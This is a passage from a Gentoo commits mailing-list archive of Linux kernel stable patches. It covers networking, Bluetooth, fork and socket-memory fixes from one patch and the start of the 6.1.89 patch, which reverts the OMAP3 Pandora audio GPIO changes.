+ 	int (*mdo_get_rx_sc_stats)(struct macsec_context *ctx);
+ 	int (*mdo_get_rx_sa_stats)(struct macsec_context *ctx);
++	bool rx_uses_md_dst;
+ };
+ 
+ void macsec_pn_wrapped(struct macsec_secy *secy, struct macsec_tx_sa *tx_sa);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 60577751ea9e8..77298c74822a6 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1483,33 +1483,36 @@ sk_memory_allocated(const struct sock *sk)
+ 
+ /* 1 MB per cpu, in page units */
+ #define SK_MEMORY_PCPU_RESERVE (1 << (20 - PAGE_SHIFT))
++extern int sysctl_mem_pcpu_rsv;
++
++static inline void proto_memory_pcpu_drain(struct proto *proto)
++{
++	int val = this_cpu_xchg(*proto->per_cpu_fw_alloc, 0);
++
++	if (val)
++		atomic_long_add(val, proto->memory_allocated);
++}
+ 
+ static inline void
+-sk_memory_allocated_add(struct sock *sk, int amt)
++sk_memory_allocated_add(const struct sock *sk, int val)
+ {
+-	int local_reserve;
++	struct proto *proto = sk->sk_prot;
+ 
+-	preempt_disable();
+-	local_reserve = __this_cpu_add_return(*sk->sk_prot->per_cpu_fw_alloc, amt);
+-	if (local_reserve >= SK_MEMORY_PCPU_RESERVE) {
+-		__this_cpu_sub(*sk->sk_prot->per_cpu_fw_alloc, local_reserve);
+-		atomic_long_add(local_reserve, sk->sk_prot->memory_allocated);
+-	}
+-	preempt_enable();
++	val = this_cpu_add_return(*proto->per_cpu_fw_alloc, val);
++
++	if (unlikely(val >= READ_ONCE(sysctl_mem_pcpu_rsv)))
++		proto_memory_pcpu_drain(proto);
+ }
+ 
+ static inline void
+-sk_memory_allocated_sub(struct sock *sk, int amt)
++sk_memory_allocated_sub(const struct sock *sk, int val)
+ {
+-	int local_reserve;
++	struct proto *proto = sk->sk_prot;
+ 
+-	preempt_disable();
+-	local_reserve = __this_cpu_sub_return(*sk->sk_prot->per_cpu_fw_alloc, amt);
+-	if (local_reserve <= -SK_MEMORY_PCPU_RESERVE) {
+-		__this_cpu_sub(*sk->sk_prot->per_cpu_fw_alloc, local_reserve);
+-		atomic_long_add(local_reserve, sk->sk_prot->memory_allocated);
+-	}
+-	preempt_enable();
++	val = this_cpu_sub_return(*proto->per_cpu_fw_alloc, val);
++
++	if (unlikely(val <= -READ_ONCE(sysctl_mem_pcpu_rsv)))
++		proto_memory_pcpu_drain(proto);
+ }
+ 
+ #define SK_ALLOC_PERCPU_COUNTER_BATCH 16
+diff --git a/init/Kconfig b/init/Kconfig
+index b63dce6706c5c..537f01eba2e6f 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1920,11 +1920,11 @@ config RUST
+ 	bool "Rust support"
+ 	depends on HAVE_RUST
+ 	depends on RUST_IS_AVAILABLE
++	depends on !CFI_CLANG
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
+ 	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+-	select CONSTRUCTORS
+ 	help
+ 	  Enables Rust support in the kernel.
+ 
+diff --git a/kernel/bounds.c b/kernel/bounds.c
+index c5a9fcd2d6228..29b2cd00df2cc 100644
+--- a/kernel/bounds.c
++++ b/kernel/bounds.c
+@@ -19,7 +19,7 @@ int main(void)
+ 	DEFINE(NR_PAGEFLAGS, __NR_PAGEFLAGS);
+ 	DEFINE(MAX_NR_ZONES, __MAX_NR_ZONES);
+ #ifdef CONFIG_SMP
+-	DEFINE(NR_CPUS_BITS, bits_per(CONFIG_NR_CPUS));
++	DEFINE(NR_CPUS_BITS, order_base_2(CONFIG_NR_CPUS));
+ #endif
+ 	DEFINE(SPINLOCK_SIZE, sizeof(spinlock_t));
+ #ifdef CONFIG_LRU_GEN
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 2c44dd12a158c..e0e09b700b430 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -2788,8 +2788,8 @@ enum cpu_mitigations {
+ };
+ 
+ static enum cpu_mitigations cpu_mitigations __ro_after_init =
+-	IS_ENABLED(CONFIG_SPECULATION_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
+-						     CPU_MITIGATIONS_OFF;
++	IS_ENABLED(CONFIG_CPU_MITIGATIONS) ? CPU_MITIGATIONS_AUTO :
++					     CPU_MITIGATIONS_OFF;
+ 
+ static int __init mitigations_parse_cmdline(char *arg)
+ {
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 85617928041cf..7e9a5919299b4 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -662,6 +662,15 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		} else if (anon_vma_fork(tmp, mpnt))
+ 			goto fail_nomem_anon_vma_fork;
+ 		tmp->vm_flags &= ~(VM_LOCKED | VM_LOCKONFAULT);
++		/*
++		 * Copy/update hugetlb private vma information.
++		 */
++		if (is_vm_hugetlb_page(tmp))
++			hugetlb_dup_vma_private(tmp);
++
++		if (tmp->vm_ops && tmp->vm_ops->open)
++			tmp->vm_ops->open(tmp);
++
+ 		file = tmp->vm_file;
+ 		if (file) {
+ 			struct address_space *mapping = file->f_mapping;
+@@ -678,12 +687,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 			i_mmap_unlock_write(mapping);
+ 		}
+ 
+-		/*
+-		 * Copy/update hugetlb private vma information.
+-		 */
+-		if (is_vm_hugetlb_page(tmp))
+-			hugetlb_dup_vma_private(tmp);
+-
+ 		/* Link the vma into the MT */
+ 		mas.index = tmp->vm_start;
+ 		mas.last = tmp->vm_end - 1;
+@@ -695,9 +698,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		if (!(tmp->vm_flags & VM_WIPEONFORK))
+ 			retval = copy_page_range(tmp, mpnt);
+ 
+-		if (tmp->vm_ops && tmp->vm_ops->open)
+-			tmp->vm_ops->open(tmp);
+-
+ 		if (retval)
+ 			goto loop_out;
+ 	}
+diff --git a/lib/stackdepot.c b/lib/stackdepot.c
+index 79e894cf84064..77eb944b7a6bd 100644
+--- a/lib/stackdepot.c
++++ b/lib/stackdepot.c
+@@ -466,10 +466,10 @@ depot_stack_handle_t __stack_depot_save(unsigned long *entries,
+ 		/*
+ 		 * Zero out zone modifiers, as we don't have specific zone
+ 		 * requirements. Keep the flags related to allocation in atomic
+-		 * contexts and I/O.
++		 * contexts, I/O, nolockdep.
+ 		 */
+ 		alloc_flags &= ~GFP_ZONEMASK;
+-		alloc_flags &= (GFP_ATOMIC | GFP_KERNEL);
++		alloc_flags &= (GFP_ATOMIC | GFP_KERNEL | __GFP_NOLOCKDEP);
+ 		alloc_flags |= __GFP_NOWARN;
+ 		page = alloc_pages(alloc_flags, STACK_ALLOC_ORDER);
+ 		if (page)
+diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c
+index 6b4c25a923774..0bffac238b615 100644
+--- a/net/ax25/af_ax25.c
++++ b/net/ax25/af_ax25.c
+@@ -103,7 +103,7 @@ static void ax25_kill_by_device(struct net_device *dev)
+ 			s->ax25_dev = NULL;
+ 			if (sk->sk_socket) {
+ 				netdev_put(ax25_dev->dev,
+-					   &ax25_dev->dev_tracker);
++					   &s->dev_tracker);
+ 				ax25_dev_put(ax25_dev);
+ 			}
+ 			ax25_cb_del(s);
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index 4198ca66fbe10..e3c7029ec8a61 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -457,7 +457,8 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 	struct l2cap_chan *chan = l2cap_pi(sk)->chan;
+ 	struct l2cap_options opts;
+ 	struct l2cap_conninfo cinfo;
+-	int len, err = 0;
++	int err = 0;
++	size_t len;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -504,7 +505,7 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 
+ 		BT_DBG("mode 0x%2.2x", chan->mode);
+ 
+-		len = min_t(unsigned int, len, sizeof(opts));
++		len = min(len, sizeof(opts));
+ 		if (copy_to_user(optval, (char *) &opts, len))
+ 			err = -EFAULT;
+ 
+@@ -554,7 +555,7 @@ static int l2cap_sock_getsockopt_old(struct socket *sock, int optname,
+ 		cinfo.hci_handle = chan->conn->hcon->handle;
+ 		memcpy(cinfo.dev_class, chan->conn->hcon->dev_class, 3);
+ 
+-		len = min_t(unsigned int, len, sizeof(cinfo));
++		len = min(len, sizeof(cinfo));
+ 		if (copy_to_user(optval, (char *) &cinfo, len))
+ 			err = -EFAULT;
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 716f6dc4934b7..76dac5a90aef0 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2680,7 +2680,11 @@ static int add_uuid(struct sock *sk, struct hci_dev *hdev, void *data, u16 len)
+ 		goto failed;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, add_uuid_sync, cmd, mgmt_class_complete);
++	/* MGMT_OP_ADD_UUID don't require adapter the UP/Running so use
++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, add_uuid_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0) {
+ 		mgmt_pending_free(cmd);
+ 		goto failed;
+@@ -2774,8 +2778,11 @@ static int remove_uuid(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, remove_uuid_sync, cmd,
+-				 mgmt_class_complete);
++	/* MGMT_OP_REMOVE_UUID don't require adapter the UP/Running so use
++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, remove_uuid_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0)
+ 		mgmt_pending_free(cmd);
+ 
+@@ -2841,8 +2848,11 @@ static int set_dev_class(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, set_class_sync, cmd,
+-				 mgmt_class_complete);
++	/* MGMT_OP_SET_DEV_CLASS don't require adapter the UP/Running so use
++	 * hci_cmd_sync_submit instead of hci_cmd_sync_queue.
++	 */
++	err = hci_cmd_sync_submit(hdev, set_class_sync, cmd,
++				  mgmt_class_complete);
+ 	if (err < 0)
+ 		mgmt_pending_free(cmd);
+ 
+@@ -5530,8 +5540,8 @@ static int remove_adv_monitor(struct sock *sk, struct hci_dev *hdev,
+ 		goto unlock;
+ 	}
+ 
+-	err = hci_cmd_sync_queue(hdev, mgmt_remove_adv_monitor_sync, cmd,
+-				 mgmt_remove_adv_monitor_complete);
++	err = hci_cmd_sync_submit(hdev, mgmt_remove_adv_monitor_sync, cmd,
++				  mgmt_remove_adv_monitor_complete);
+ 
+ 	if (err) {
+ 		mgmt_pending_remove(cmd);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 2e9137c539a49..4a6bf60f3e7aa 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -971,7 +971,8 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct sco_options opts;
+ 	struct sco_conninfo cinfo;
+-	int len, err = 0;
++	int err = 0;
++	size_t len;
+ 
+ 	BT_DBG("sk %p", sk);
+ 
+@@ -993,7 +994,7 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 
+ 		BT_DBG("mtu %u", opts.mtu);
+ 
+-		len = min_t(unsigned int, len, sizeof(opts));
++		len = min(len, sizeof(opts));
+ 		if (copy_to_user(optval, (char *)&opts, len))
+ 			err = -EFAULT;
+ 
+@@ -1011,7 +1012,7 @@ static int sco_sock_getsockopt_old(struct socket *sock, int optname,
+ 		cinfo.hci_handle = sco_pi(sk)->conn->hcon->handle;
+ 		memcpy(cinfo.dev_class, sco_pi(sk)->conn->hcon->dev_class, 3);
+ 
+-		len = min_t(unsigned int, len, sizeof(cinfo));
++		len = min(len, sizeof(cinfo));
+ 		if (copy_to_user(optval, (char *)&cinfo, len))
+ 			err = -EFAULT;
+ 
+diff --git a/net/bridge/br_netlink.c b/net/bridge/br_netlink.c
+index d087fd4c784ac..d38eff27767dc 100644
+--- a/net/bridge/br_netlink.c
++++ b/net/bridge/br_netlink.c
+@@ -650,7 +650,7 @@ void br_ifinfo_notify(int event, const struct net_bridge *br,
+ {
+ 	u32 filter = RTEXT_FILTER_BRVLAN_COMPRESSED;
+ 
+-	return br_info_notify(event, br, port, filter);
++	br_info_notify(event, br, port, filter);
+ }
+ 
+ /*
+diff --git a/net/core/sock.c b/net/core/sock.c
+index c8803b95ea0da..550af616f5359 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -279,6 +279,7 @@ __u32 sysctl_rmem_max __read_mostly = SK_RMEM_MAX;
+ EXPORT_SYMBOL(sysctl_rmem_max);
+ __u32 sysctl_wmem_default __read_mostly = SK_WMEM_MAX;
+ __u32 sysctl_rmem_default __read_mostly = SK_RMEM_MAX;
++int sysctl_mem_pcpu_rsv __read_mostly = SK_MEMORY_PCPU_RESERVE;
+ 
+ /* Maximal space eaten by iovec or ancillary data plus some space */
+ int sysctl_optmem_max __read_mostly = sizeof(unsigned long)*(2*UIO_MAXIOV+512);
+diff --git a/net/core/sysctl_net_core.c b/net/core/sysctl_net_core.c
+index 5b1ce656baa1d..d281d5343ff4a 100644
+--- a/net/core/sysctl_net_core.c
++++ b/net/core/sysctl_net_core.c
+@@ -29,6 +29,7 @@ static int int_3600 = 3600;
+ static int min_sndbuf = SOCK_MIN_SNDBUF;
+ static int min_rcvbuf = SOCK_MIN_RCVBUF;
+ static int max_skb_frags = MAX_SKB_FRAGS;
++static int min_mem_pcpu_rsv = SK_MEMORY_PCPU_RESERVE;
+ 
+ static int net_msg_warn;	/* Unused, but still a sysctl */
+ 
+@@ -348,6 +349,14 @@ static struct ctl_table net_core_table[] = {
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_rcvbuf,
+ 	},
++	{
++		.procname	= "mem_pcpu_rsv",
++		.data		= &sysctl_mem_pcpu_rsv,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= &min_mem_pcpu_rsv,
++	},
+ 	{
+ 		.procname	= "dev_weight",
+ 		.data		= &weight_p,
+diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c
+index e02daa74e8334..5ba7b460cbf76 100644
+--- a/net/ethernet/eth.c
++++ b/net/ethernet/eth.c
+@@ -164,17 +164,7 @@ __be16 eth_type_trans(struct sk_buff *skb, struct net_device *dev)
+ 	eth = (struct ethhdr *)skb->data;
+ 	skb_pull_inline(skb, ETH_HLEN);
+ 
+-	if (unlikely(!ether_addr_equal_64bits(eth->h_dest,
+-					      dev->dev_addr))) {
+-		if (unlikely(is_multicast_ether_addr_64bits(eth->h_dest))) {
+-			if (ether_addr_equal_64bits(eth->h_dest, dev->broadcast))
+-				skb->pkt_type = PACKET_BROADCAST;
+-			else
+-				skb->pkt_type = PACKET_MULTICAST;
+-		} else {
+-			skb->pkt_type = PACKET_OTHERHOST;
+-		}
+-	}
++	eth_skb_pkt_type(skb, dev);
+ 
+ 	/*
+ 	 * Some variants of DSA tagging don't have an ethertype field
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index 2b09ef70752f9..31051b327e53c 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -92,6 +92,7 @@
+ #include <net/inet_common.h>
+ #include <net/ip_fib.h>
+ #include <net/l3mdev.h>
++#include <net/addrconf.h>
+ 
+ /*
+  *	Build xmit assembly blocks
+@@ -1029,6 +1030,8 @@ bool icmp_build_probe(struct sk_buff *skb, struct icmphdr *icmphdr)
+ 	struct icmp_ext_hdr *ext_hdr, _ext_hdr;
+ 	struct icmp_ext_echo_iio *iio, _iio;
+ 	struct net *net = dev_net(skb->dev);
++	struct inet6_dev *in6_dev;
++	struct in_device *in_dev;
+ 	struct net_device *dev;
+ 	char buff[IFNAMSIZ];
+ 	u16 ident_len;
+@@ -1112,10 +1115,15 @@ bool icmp_build_probe(struct sk_buff *skb, struct icmphdr *icmphdr)
+ 	/* Fill bits in reply message */
+ 	if (dev->flags & IFF_UP)
+ 		status |= ICMP_EXT_ECHOREPLY_ACTIVE;
+-	if (__in_dev_get_rcu(dev) && __in_dev_get_rcu(dev)->ifa_list)
++
++	in_dev = __in_dev_get_rcu(dev);
++	if (in_dev && rcu_access_pointer(in_dev->ifa_list))
+ 		status |= ICMP_EXT_ECHOREPLY_IPV4;
+-	if (!list_empty(&rcu_dereference(dev->ip6_ptr)->addr_list))
++
++	in6_dev = __in6_dev_get(dev);
++	if (in6_dev && !list_empty(&in6_dev->addr_list))
+ 		status |= ICMP_EXT_ECHOREPLY_IPV6;
++
+ 	dev_put(dev);
+ 	icmphdr->un.echo.sequence |= htons(status);
+ 	return true;
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index a0c687ff25987..6c0f1e347b855 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -2168,6 +2168,9 @@ int ip_route_use_hint(struct sk_buff *skb, __be32 daddr, __be32 saddr,
+ 	int err = -EINVAL;
+ 	u32 tag = 0;
+ 
++	if (!in_dev)
++		return -EINVAL;
++
+ 	if (ipv4_is_multicast(saddr) || ipv4_is_lbcast(saddr))
+ 		goto martian_source;
+ 
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 2a78c78186c37..39fae7581d350 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -1141,16 +1141,17 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	if (msg->msg_controllen) {
+ 		err = udp_cmsg_send(sk, msg, &ipc.gso_size);
+-		if (err > 0)
++		if (err > 0) {
+ 			err = ip_cmsg_send(sk, msg, &ipc,
+ 					   sk->sk_family == AF_INET6);
++			connected = 0;
++		}
+ 		if (unlikely(err < 0)) {
+ 			kfree(ipc.opt);
+ 			return err;
+ 		}
+ 		if (ipc.opt)
+ 			free = 1;
+-		connected = 0;
+ 	}
+ 	if (!ipc.opt) {
+ 		struct ip_options_rcu *inet_opt;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 1775e9b9b85ad..504ea27d08fb0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1493,9 +1493,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		ipc6.opt = opt;
+ 
+ 		err = udp_cmsg_send(sk, msg, &ipc6.gso_size);
+-		if (err > 0)
++		if (err > 0) {
+ 			err = ip6_datagram_send_ctl(sock_net(sk), sk, msg, fl6,
+ 						    &ipc6);
++			connected = false;
++		}
+ 		if (err < 0) {
+ 			fl6_sock_release(flowlabel);
+ 			return err;
+@@ -1507,7 +1509,6 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		}
+ 		if (!(opt->opt_nflen|opt->opt_flen))
+ 			opt = NULL;
+-		connected = false;
+ 	}
+ 	if (!opt) {
+ 		opt = txopt_get(np);
+diff --git a/net/netfilter/ipvs/ip_vs_proto_sctp.c b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+index a0921adc31a9f..1e689c7141271 100644
+--- a/net/netfilter/ipvs/ip_vs_proto_sctp.c
++++ b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+@@ -126,7 +126,8 @@ sctp_snat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	if (sctph->source != cp->vport || payload_csum ||
+ 	    skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		sctph->source = cp->vport;
+-		sctp_nat_csum(skb, sctph, sctphoff);
++		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+ 	}
+@@ -174,7 +175,8 @@ sctp_dnat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	    (skb->ip_summed == CHECKSUM_PARTIAL &&
+ 	     !(skb_dst(skb)->dev->features & NETIF_F_SCTP_CRC))) {
+ 		sctph->dest = cp->dport;
+-		sctp_nat_csum(skb, sctph, sctphoff);
++		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else if (skb->ip_summed != CHECKSUM_PARTIAL) {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+ 	}
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index 274b6f7e6bb57..d170758a1eb5d 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -338,7 +338,9 @@ static void nft_netdev_event(unsigned long event, struct net_device *dev,
+ 		return;
+ 
+ 	if (n > 1) {
+-		nf_unregister_net_hook(ctx->net, &found->ops);
++		if (!(ctx->chain->table->flags & NFT_TABLE_F_DORMANT))
++			nf_unregister_net_hook(ctx->net, &found->ops);
++
+ 		list_del_rcu(&found->list);
+ 		kfree_rcu(found, rcu);
+ 		return;
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index e4ba86b84b9b1..2302bae1e0128 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1920,9 +1920,9 @@ static void ovs_ct_limit_exit(struct net *net, struct ovs_net *ovs_net)
+ 	for (i = 0; i < CT_LIMIT_HASH_BUCKETS; ++i) {
+ 		struct hlist_head *head = &info->limits[i];
+ 		struct ovs_ct_limit *ct_limit;
++		struct hlist_node *next;
+ 
+-		hlist_for_each_entry_rcu(ct_limit, head, hlist_node,
+-					 lockdep_ovsl_is_held())
++		hlist_for_each_entry_safe(ct_limit, next, head, hlist_node)
+ 			kfree_rcu(ct_limit, rcu);
+ 	}
+ 	kfree(info->limits);
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 85c6f05c0fa3c..d2fc795394a52 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -260,7 +260,7 @@ void unix_gc(void)
+ 			__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
+ 
+ 			if (sk->sk_state == TCP_LISTEN) {
+-				unix_state_lock(sk);
++				unix_state_lock_nested(sk, U_LOCK_GC_LISTENER);
+ 				unix_state_unlock(sk);
+ 			}
+ 		}
+diff --git a/rust/macros/lib.rs b/rust/macros/lib.rs
+index 91764bfb1f893..f2efa86a747a3 100644
+--- a/rust/macros/lib.rs
++++ b/rust/macros/lib.rs
+@@ -27,18 +27,6 @@
+ ///     author: b"Rust for Linux Contributors",
+ ///     description: b"My very own kernel module!",
+ ///     license: b"GPL",
+-///     params: {
+-///        my_i32: i32 {
+-///            default: 42,
+-///            permissions: 0o000,
+-///            description: b"Example of i32",
+-///        },
+-///        writeable_i32: i32 {
+-///            default: 42,
+-///            permissions: 0o644,
+-///            description: b"Example of i32",
+-///        },
+-///    },
+ /// }
+ ///
+ /// struct MyModule;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-29 11:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-29 11:30 UTC (permalink / raw
  To: gentoo-commits

commit:     844998387fd9d7d10658d0eaaaaa4fb2d4afb787
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Apr 29 11:30:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Apr 29 11:30:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=84499838

Linux patch 6.1.89, this time for real

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1088_linux-6.1.89.patch | 168 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 168 insertions(+)

diff --git a/1088_linux-6.1.89.patch b/1088_linux-6.1.89.patch
new file mode 100644
index 00000000..4b4067bb
--- /dev/null
+++ b/1088_linux-6.1.89.patch
@@ -0,0 +1,168 @@
+diff --git a/Makefile b/Makefile
+index c73cb678fb9ac..a0472e1cf7156 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 88
++SUBLEVEL = 89
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-omap2/pdata-quirks.c b/arch/arm/mach-omap2/pdata-quirks.c
+index 44da1e14a3740..9deba798cc919 100644
+--- a/arch/arm/mach-omap2/pdata-quirks.c
++++ b/arch/arm/mach-omap2/pdata-quirks.c
+@@ -257,19 +257,9 @@ static struct platform_device pandora_backlight = {
+ 	.id	= -1,
+ };
+ 
+-static struct gpiod_lookup_table pandora_soc_audio_gpios = {
+-	.dev_id = "soc-audio",
+-	.table = {
+-		GPIO_LOOKUP("gpio-112-127", 6, "dac", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("gpio-0-15", 14, "amp", GPIO_ACTIVE_HIGH),
+-		{ }
+-	},
+-};
+-
+ static void __init omap3_pandora_legacy_init(void)
+ {
+ 	platform_device_register(&pandora_backlight);
+-	gpiod_add_lookup_table(&pandora_soc_audio_gpios);
+ }
+ #endif /* CONFIG_ARCH_OMAP3 */
+ 
+diff --git a/sound/soc/ti/omap3pandora.c b/sound/soc/ti/omap3pandora.c
+index fa92ed97dfe3b..a287e9747c2a1 100644
+--- a/sound/soc/ti/omap3pandora.c
++++ b/sound/soc/ti/omap3pandora.c
+@@ -7,7 +7,7 @@
+ 
+ #include <linux/clk.h>
+ #include <linux/platform_device.h>
+-#include <linux/gpio/consumer.h>
++#include <linux/gpio.h>
+ #include <linux/delay.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/module.h>
+@@ -21,11 +21,12 @@
+ 
+ #include "omap-mcbsp.h"
+ 
++#define OMAP3_PANDORA_DAC_POWER_GPIO	118
++#define OMAP3_PANDORA_AMP_POWER_GPIO	14
++
+ #define PREFIX "ASoC omap3pandora: "
+ 
+ static struct regulator *omap3pandora_dac_reg;
+-static struct gpio_desc *dac_power_gpio;
+-static struct gpio_desc *amp_power_gpio;
+ 
+ static int omap3pandora_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_pcm_hw_params *params)
+@@ -77,9 +78,9 @@ static int omap3pandora_dac_event(struct snd_soc_dapm_widget *w,
+ 			return ret;
+ 		}
+ 		mdelay(1);
+-		gpiod_set_value(dac_power_gpio, 1);
++		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 1);
+ 	} else {
+-		gpiod_set_value(dac_power_gpio, 0);
++		gpio_set_value(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
+ 		mdelay(1);
+ 		regulator_disable(omap3pandora_dac_reg);
+ 	}
+@@ -91,9 +92,9 @@ static int omap3pandora_hp_event(struct snd_soc_dapm_widget *w,
+ 	struct snd_kcontrol *k, int event)
+ {
+ 	if (SND_SOC_DAPM_EVENT_ON(event))
+-		gpiod_set_value(amp_power_gpio, 1);
++		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 1);
+ 	else
+-		gpiod_set_value(amp_power_gpio, 0);
++		gpio_set_value(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
+ 
+ 	return 0;
+ }
+@@ -228,10 +229,35 @@ static int __init omap3pandora_soc_init(void)
+ 
+ 	pr_info("OMAP3 Pandora SoC init\n");
+ 
++	ret = gpio_request(OMAP3_PANDORA_DAC_POWER_GPIO, "dac_power");
++	if (ret) {
++		pr_err(PREFIX "Failed to get DAC power GPIO\n");
++		return ret;
++	}
++
++	ret = gpio_direction_output(OMAP3_PANDORA_DAC_POWER_GPIO, 0);
++	if (ret) {
++		pr_err(PREFIX "Failed to set DAC power GPIO direction\n");
++		goto fail0;
++	}
++
++	ret = gpio_request(OMAP3_PANDORA_AMP_POWER_GPIO, "amp_power");
++	if (ret) {
++		pr_err(PREFIX "Failed to get amp power GPIO\n");
++		goto fail0;
++	}
++
++	ret = gpio_direction_output(OMAP3_PANDORA_AMP_POWER_GPIO, 0);
++	if (ret) {
++		pr_err(PREFIX "Failed to set amp power GPIO direction\n");
++		goto fail1;
++	}
++
+ 	omap3pandora_snd_device = platform_device_alloc("soc-audio", -1);
+ 	if (omap3pandora_snd_device == NULL) {
+ 		pr_err(PREFIX "Platform device allocation failed\n");
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto fail1;
+ 	}
+ 
+ 	platform_set_drvdata(omap3pandora_snd_device, &snd_soc_card_omap3pandora);
+@@ -242,20 +268,6 @@ static int __init omap3pandora_soc_init(void)
+ 		goto fail2;
+ 	}
+ 
+-	dac_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
+-					"dac", GPIOD_OUT_LOW);
+-	if (IS_ERR(dac_power_gpio)) {
+-		ret = PTR_ERR(dac_power_gpio);
+-		goto fail3;
+-	}
+-
+-	amp_power_gpio = devm_gpiod_get(&omap3pandora_snd_device->dev,
+-					"amp", GPIOD_OUT_LOW);
+-	if (IS_ERR(amp_power_gpio)) {
+-		ret = PTR_ERR(amp_power_gpio);
